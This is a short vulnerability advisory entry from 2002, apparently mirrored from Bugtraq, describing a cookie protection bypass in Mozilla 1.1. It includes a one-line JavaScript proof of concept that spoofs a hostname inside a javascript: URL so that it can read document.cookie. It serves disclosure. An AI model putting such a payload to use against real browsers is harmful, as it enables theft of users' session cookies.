Lucene search

K
securityvulnsBUGTRAQSECURITYVULNS:VULN:2177
HistoryJul 24, 2002 - 12:00 a.m.

Cookie protection bypass in Mozilla

2002-07-2400:00:00
BUGTRAQ
vulners.com
21

It's possible to obtain cookie by spoofing valid hostname in javascript: URL. For example
f.location = "javascript://www.google.com/\n"+
"'<body onload=alert(document.cookie)>'";

CPENameOperatorVersion
mozillaeq1.1